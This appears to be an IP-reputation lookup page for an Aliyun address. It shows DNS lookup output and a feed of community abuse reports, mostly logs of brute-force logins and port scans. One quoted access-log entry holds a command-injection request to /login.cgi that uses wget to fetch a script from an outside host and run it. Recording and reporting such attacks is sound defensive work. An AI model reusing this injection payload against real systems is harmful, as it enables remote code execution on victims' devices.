114.55.171.1 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): Aliyun Computing Co. Ltd

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	SASL PLAIN auth failed: ruser=...	2020-06-02 07:38:08

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 114.55.171.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 28674
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;114.55.171.1.			IN	A

;; AUTHORITY SECTION:
.			315	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020060101 1800 900 604800 86400

;; Query time: 54 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Jun 02 07:38:05 CST 2020
;; MSG SIZE  rcvd: 116

HOST信息:

Host 1.171.55.114.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 1.171.55.114.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
23.245.69.87	attackbotsspam	IP Ban Report : https://help-dysk.pl/wordpress-firewall-plugins/ip/23.245.69.87/ US - 1H : (328) Protection Against DDoS WordPress plugin : "odzyskiwanie danych help-dysk" IP Address Ranges by Country : US NAME ASN : ASN18978 IP : 23.245.69.87 CIDR : 23.245.64.0/18 PREFIX COUNT : 233 UNIQUE IP COUNT : 684800 WYKRYTE ATAKI Z ASN18978 : 1H - 1 3H - 1 6H - 1 12H - 1 24H - 1 DateTime : 2019-10-10 13:57:10 INFO : Looking for resource vulnerabilities 403 Detected and Blocked by ADMIN - data recovery	2019-10-10 22:10:58
124.165.232.138	attackbots	Oct 10 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 13 secs$: user=\, method=PLAIN, rip=124.165.232.138, lip=REMOVED, TLS, session=\<9X2KHYiUo5p8peiK\> Oct 10 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 8 secs$: user=\, method=PLAIN, rip=124.165.232.138, lip=REMOVED, TLS: Disconnected, session=\ Oct 10 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 7 secs$: user=\, method=PLAIN, rip=124.165.232.138, lip=REMOVED, TLS, session=\<6G2+Go2U3dF8peiK\>	2019-10-10 21:57:30
61.164.202.50	attack	Automatic report - Port Scan Attack	2019-10-10 22:12:43
158.69.193.32	attackspam	2019-10-10T13:04:40.825810abusebot.cloudsearch.cf sshd\[16970\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=32.ip-158-69-193.net user=root	2019-10-10 22:31:38
176.31.40.52	attackbotsspam	Port Scan: TCP/443	2019-10-10 21:57:16
105.234.166.7	attackspambots	B: Magento admin pass /admin/ test (wrong country)	2019-10-10 22:02:36
218.65.220.48	attack	Oct 10 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 7 secs$: user=\, method=PLAIN, rip=218.65.220.48, lip=REMOVED, TLS, session=\<6d9iO4mU4dTaQdww\> Oct 10 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 7 secs$: user=\, method=PLAIN, rip=218.65.220.48, lip=REMOVED, TLS, session=\ Oct 10 REMOVED dovecot: imap-login: Disconnected $auth failed, 1 attempts in 6 secs$: user=\, method=PLAIN, rip=218.65.220.48, lip=REMOVED, TLS: Disconnected, session=\	2019-10-10 22:05:29
164.132.74.78	attackspam	Oct 10 15:49:34 vps691689 sshd[28543]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.74.78 Oct 10 15:49:36 vps691689 sshd[28543]: Failed password for invalid user CDE#@WSXZAQ! from 164.132.74.78 port 41512 ssh2 ...	2019-10-10 21:57:49
220.173.55.8	attackbotsspam	Automatic report - Banned IP Access	2019-10-10 21:52:03
193.159.246.242	attack	Oct 10 15:50:19 meumeu sshd[3104]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.159.246.242 Oct 10 15:50:21 meumeu sshd[3104]: Failed password for invalid user P4ssw0rd2018 from 193.159.246.242 port 39684 ssh2 Oct 10 15:54:31 meumeu sshd[3649]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.159.246.242 ...	2019-10-10 21:59:55
106.12.10.203	attack	106.12.10.203:54226 - - [09/Oct/2019:15:02:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://54.37.74.232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 313	2019-10-10 21:52:47
185.234.217.223	attackspambots	[2019-10-1013:26:42 0200]info[cpaneld]185.234.217.223--"GET/HTTP/1.1"FAILEDLOGINcpaneld:usernamenotprovidedorinvaliduser[2019-10-1013:29:10 0200]info[cpaneld]185.234.217.223--"GET/HTTP/1.1"FAILEDLOGINcpaneld:usernamenotprovidedorinvaliduser[2019-10-1013:39:53 0200]info[cpaneld]185.234.217.223--"GET/HTTP/1.1"FAILEDLOGINcpaneld:usernamenotprovidedorinvaliduser[2019-10-1013:41:35 0200]info[cpaneld]185.234.217.223--"GET/HTTP/1.1"FAILEDLOGINcpaneld:usernamenotprovidedorinvaliduser[2019-10-1013:48:18 0200]info[cpaneld]185.234.217.223--"GET/HTTP/1.1"FAILEDLOGINcpaneld:usernamenotprovidedorinvaliduser[2019-10-1013:49:44 0200]info[cpaneld]185.234.217.223--"GET/HTTP/1.1"FAILEDLOGINcpaneld:usernamenotprovidedorinvaliduser[2019-10-1013:55:49 0200]info[cpaneld]185.234.217.223--"GET/HTTP/1.1"FAILEDLOGINcpaneld:usernamenotprovidedorinvaliduser[2019-10-1013:57:22 0200]info[cpaneld]185.234.217.223--"GET/HTTP/1.1"FAILEDLOGINcpaneld:usernamenotprovidedorinvaliduser	2019-10-10 21:59:25
46.101.88.10	attackspambots	Oct 10 15:53:27 nextcloud sshd\[15164\]: Invalid user vyatta from 46.101.88.10 Oct 10 15:53:27 nextcloud sshd\[15164\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.88.10 Oct 10 15:53:29 nextcloud sshd\[15164\]: Failed password for invalid user vyatta from 46.101.88.10 port 41966 ssh2 ...	2019-10-10 22:13:33
139.129.29.4	attack	Honeypot hit.	2019-10-10 22:01:45
222.186.173.142	attackspam	frenzy	2019-10-10 21:55:59

最近上报的IP列表

99.63.64.236	185.63.253.240	173.111.208.206	40.141.165.72
137.188.211.124	65.27.253.46	152.252.46.53	72.161.131.109
76.202.39.90	218.129.210.240	58.11.48.182	177.155.36.210
221.94.45.32	14.112.253.84	5.12.60.240	167.116.51.55
54.67.247.113	143.136.24.101	92.37.66.189	184.3.49.74